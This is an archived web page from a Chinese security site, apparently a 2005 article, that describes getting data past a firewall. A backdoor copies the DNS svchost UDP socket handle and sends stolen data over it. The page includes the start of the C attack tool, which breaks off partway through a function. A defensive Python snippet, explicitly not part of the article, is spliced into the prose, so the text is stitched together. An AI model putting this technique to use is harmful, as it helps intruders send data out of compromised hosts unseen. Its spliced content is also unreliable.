<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>A New Data Transfer Technique for Penetrating Firewalls</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<meta name="Keywords" content="安全焦点, xfocus, 陷阱网络, honeynet, honeypot, 调查取证, forensic, 入侵检测, intrusion detection, 无线安全, wireless security, 安全论坛, security forums, 安全工具, security tools, 攻击程序, exploits, 安全公告, security advisories, 安全漏洞, security vulnerabilities, 安全教程, security tutorials, 安全培训, security training, 安全帮助, security help, 安全标准, security standards, 安全代码, security code, 安全资源, security resources, 安全编程, security programming, 加密, cryptography," />
<link rel="stylesheet" href="../../css/plone.css" type="text/css">
</head>
<body bgcolor="#FFFFFF" text="#000000">
<table class="columns">
<tr>
<td class="main">
<h1>A New Data Transfer Technique for Penetrating Firewalls</h1><br>Created: 2005-04-13 Updated: 2005-04-13<br>Article type: original<br>Submitted by: <a href='https://www.xfocus.net/bbs/index.php?lang=cn&act=Profile&do=03&MID=35303'>suei8423</a> (suei8423_at_163.com)<br>
<br />
Author : ZwelL<br />
Email : zwell@sohu.com<br />
Date : 2005.4.12<br />
<br />
Background for using this technique:<br />
You have planted a backdoor on a target host and need to move data out; the data matters, and you cannot afford to make much noise. In any other situation I "strongly" do not recommend this technique (I will explain why later).<br />
<br />
Given how current firewalls behave, if your own process opens a port (or even just creates a new socket) it will certainly be blocked.<br />
Conversely, one thing is equally clear: a process the firewall has already approved is never blocked when it sends data. So my idea is simple:<br />
take a socket handle that another process is allowed to transmit on and use it yourself. The procedure is as follows:<br />
<br />
1. Find the target process<br />
2. Find the SOCKET handle<br />
3. Use DuplicateHandle() to convert that SOCKET into one your own process can use.<br />
4. Transfer the data over the converted SOCKET<br />
<br />
The procedure above looks simple on paper, but implementing it runs into a number of problems (discussed later). The method also has some unpleasant aspects of its own:<br />
the SOCKET in the target process cannot be TCP, because a TCP handle already has a connection established to the outside, so only UDP will do.<br />
And across different systems and different processes it is hard to locate a stable process SOCKET.<br />
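A defender's view of the same handle-table data, as an added example that is not part of the article: a socket duplicated into a second process via DuplicateHandle() shows up as one kernel Object address appearing in two processes' handle tables. The snapshot below is constructed, its columns follow the SYSTEM_HANDLE_INFORMATION structure the article's code uses later, and the socket object-type number 0x1c is an assumed value that differs between Windows builds.<br />

```python
"""Flag socket objects reachable from more than one process (constructed example)."""
from collections import defaultdict

# Constructed handle-table snapshot. Columns follow the SYSTEM_HANDLE_INFORMATION
# fields ProcessId, ObjectTypeNumber, Handle and Object (kernel object address).
# ASSUMPTION: object type 0x1c is the socket (\Device\Afd file) type; the real
# number differs between Windows builds and must be resolved on the live system.
SOCKET_TYPE = 0x1C
SNAPSHOT = """\
pid  type  handle  object
1032 0x1c  0x2c    0x81a3f120
1032 0x1c  0x30    0x81a3f5c8
1032 0x05  0x34    0x81c00000
1780 0x1c  0x40    0x81a40010
2216 0x1c  0x18    0x81a3f5c8
2216 0x05  0x1c    0x81c00000
"""

def parse_snapshot(text):
    """Parse the whitespace-separated snapshot into (pid, type, handle, object) tuples."""
    rows = []
    for line in text.splitlines()[1:]:          # skip the header row
        pid, typ, handle, obj = line.split()
        rows.append((int(pid), int(typ, 16), int(handle, 16), int(obj, 16)))
    return rows

def shared_sockets(rows, socket_type=SOCKET_TYPE):
    """Map object address -> sorted PIDs for socket objects present in 2+ handle tables.
    A DuplicateHandle() copy produces exactly this pattern, but so does a socket a
    child process inherited at creation, so each hit still needs the parent/child
    relationship checked before it is treated as a hijacked socket."""
    owners = defaultdict(set)
    for pid, typ, _handle, obj in rows:
        if typ == socket_type:
            owners[obj].add(pid)
    return {obj: sorted(pids) for obj, pids in owners.items() if len(pids) > 1}

def foreign_holders(rows, trusted_pid, socket_type=SOCKET_TYPE):
    """PIDs other than trusted_pid (e.g. the DNS client svchost) that hold one of its sockets."""
    holders = set()
    for pids in shared_sockets(rows, socket_type).values():
        if trusted_pid in pids:
            holders.update(p for p in pids if p != trusted_pid)
    return sorted(holders)

if __name__ == "__main__":
    rows = parse_snapshot(SNAPSHOT)
    print(shared_sockets(rows))          # key 0x81a3f5c8 -> [1032, 2216]
    print(foreign_holders(rows, 1032))   # [2216]
```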
<br />
Reading that, you are a little discouraged, aren't you? Haha. Think again: there is actually a genuine "golden road" to Rome here.<br />
<br />
We know that as long as a computer is connected to a network, there is one kind of traffic that will never be blocked: DNS. Can you imagine the consequences if name-resolution traffic were<br />
blocked? Heh. Since it is never blocked, and it travels over UDP, that is where we go to work...<br />
<br />
Below is an example that transfers data by directly taking control of the DNS process (which is really svchost.exe, running under the user name NETWORK SERVICE).<br />
Many problems came up during programming: for example, there was no permission to obtain the user name of that svchost instance (though the LOCAL SERVICE one could be handled), and calling getsockname on handle value 0x2c made the program stop running, and so on.<br />
See the comments for the specific workarounds...<br />
<br />
<pre>
/*++

Made By ZwelL
zwell@sohu.com
2005.4.12
--*/

#include <winsock2.h>
#include <stdio.h>
#include <wtsapi32.h>

#pragma comment(lib, "ws2_32")
#pragma comment(lib, "wtsapi32")

#define NT_SUCCESS(status) ((NTSTATUS)(status)>=0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)

typedef LONG NTSTATUS;

/* One entry of the system handle table returned by ZwQuerySystemInformation.
   Object is the kernel object address; every handle that refers to the same
   socket, in whichever process, carries the same Object value. */
typedef struct _SYSTEM_HANDLE_INFORMATION
{
    ULONG ProcessId;
    UCHAR ObjectTypeNumber;
    UCHAR Flags;
    USHORT Handle;
    PVOID Object;
    ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

typedef ULONG (WINAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG);

ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL;

/* Resolve the undocumented ZwQuerySystemInformation export from ntdll.dll */
BOOL LocateNtdllEntry ( void )
{
    BOOL ret = FALSE;
    char NTDLL_DLL[] = "ntdll.dll";
    HMODULE ntdll_dll = NULL;

    if ( ( ntdll_dll = GetModuleHandle( NTDLL_DLL ) ) == NULL )
    {
        printf( "GetModuleHandle() failed");
        return( FALSE );
    }
    if ( !( ZwQuerySystemInformation = ( ZWQUERYSYSTEMINFORMATION )GetProcAddress( ntdll_dll, "ZwQuerySystemInformation" ) ) )
    {
        goto LocateNtdllEntry_exit;
    }
    ret = TRUE;

LocateNtdllEntry_exit:

    if ( FALSE == ret )
    {
        printf( "GetProcAddress() failed");
    }
    ntdll_dll = NULL;
    return( ret );
}


/*++
This routine is used to get a process's username from its SID
--*/
BOOL GetUserNameFromSid(PSID pUserSid, char *szUserName)
{
    // sanity checks and default value
    if (pUserSid == NULL)
        return false;
    strcpy(szUserName, "?");

    SID_NAME_USE snu;
    TCHAR szUser[_MAX_PATH];
    DWORD chUser = _MAX_PATH;
    PDWORD pcchUser = &chUser;
    TCHAR szDomain[_MAX_PATH];
    DWORD chDomain = _MAX_PATH;
    PDWORD pcchDomain = &chDomain;

    // Retrieve user name and domain name based on user's SID.
    if (
        ::LookupAccountSid(
            NULL,
            pUserSid,
            szUser,
            pcchUser,
            szDomain,
            pcchDomain,
            &snu
        )
</pre>